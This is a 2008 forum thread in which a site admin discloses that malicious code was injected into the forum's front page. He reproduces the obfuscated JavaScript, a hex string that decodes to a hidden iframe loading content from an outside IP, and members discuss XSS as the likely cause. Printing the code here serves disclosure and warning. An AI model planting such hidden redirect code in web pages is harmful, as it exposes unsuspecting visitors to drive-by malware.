TMO Talk: We've been hacked...

Welcome to TMO

Home
Talk
Rants
Life
Music
Web
Media
Society
Sex
Announce
Games

How do I get a tag ?

Read the FAQ !

email us

my profile login | search | faq | forum home

»	TMO Talk » Life » We've been hacked...

Author

Topic: We've been hacked...

Darryn.R
TMO Admin

posted

Some sneaky little fuckwits dun been and gone put this code on the TMO server !

code:

 <iframe src='http://url' width='1' height='1' style='visibility: hidden;'>
</iframe><script>function v47d2ad7bb6ca9(v47d2ad7bb70a6){ var v47d2ad7bb74a0=16; return(parseInt(v47d2ad7bb70a6,v47d2ad7bb74a0));}function v47d2ad7bb7c9a(v47d2ad7bb80af)
{  var v47d2ad7bb84b7='';for(v47d2ad7bb8a57=0; v47d2ad7bb8a57<v47d2ad7bb80af.length; v47d2ad7bb8a57+=2){ v47d2ad7bb84b7+=(String.fromCharCode(v47d2ad7bb6ca9(v47d2ad7bb80af.substr(v47d2ad7bb8a57, 2))));}
return v47d2ad7bb84b7;} document.write(v47d2ad7bb7c9a('3C5343524950543E77696E646F772E7374617475733D2744
6F6E65273B646F63756D656E742E777269746528273C696672
616D65206E616D653D6432207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F
6D28292A313534323536292B27396366616339663965395C27
2077696474683D343936206865696768743D33313120737479
6C653D5C27646973706C61793A206E6F6E655C273E3C2F6966
72616D653E27293C2F5343524950543E'));
</script>

It only seems to matter if you've been to the front page recently as it's a PHP redirect iframe thingy, I found it and removed it, but you'd best check your PC's and run anti virus software.

Sorry all..

I've been in touch with the people who admin my server to see if they can help..

Sabian, you seen this before ?

I know its a redirect to a IP address hosted in Russia.

[ 08.03.2008, 13:58: Message edited by: Darryn.R ]

--------------------

my own brother a god dam shit sucking vampire!!! you wait till mum finds out buddy!

Posts: 6961 | IP: Logged

sabian

posted

code:

3C5343524950543E77696E646F772E7374617475733D2744
6F6E65273B646F63756D656E742E777269746528273C696672
616D65206E616D653D6432207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F
6D28292A313534323536292B27396366616339663965395C27
2077696474683D343936206865696768743D33313120737479
6C653D5C27646973706C61793A206E6F6E655C273E3C2F6966
72616D653E27293C2F5343524950543E

Is another iframe going to 77.221.xxx.xxx IP

have I heard of it? Someone has either XSS you or managed to brute your account. I'm assuming it was a XSS of the CMS front end as if it was a successful brute, the code would be present on all pages, not just index.

There is a spate of exploits going around though that can be identified, but no one really knows how they get there or even what some of them do.

http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/
http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/
http://www.webhostingtalk.com/showthread.php?t=651748
amongst more

Not to mention a new trick by using Google to help you get fucked by botnets...

--------------------
Evil isn't what you've done, it's feeling bad about it afterwards... Yield to temptation. It may not pass your way again.

Posts: 3793 | IP: Logged

Darryn.R
TMO Admin

posted

XSS almost certainly, yes it's going (or was till I removed it) to 77.221.xxx.xxx IP

Right arse pain.

--------------------

my own brother a god dam shit sucking vampire!!! you wait till mum finds out buddy!

Posts: 6961 | IP: Logged

Darryn.R
TMO Admin

posted

Seen it on a few other sites now too (not mine, not my server), this thing seems to have gone on a serious rampage Friday night..

--------------------

my own brother a god dam shit sucking vampire!!! you wait till mum finds out buddy!

Posts: 6961 | IP: Logged

Printer-friendly view of this topic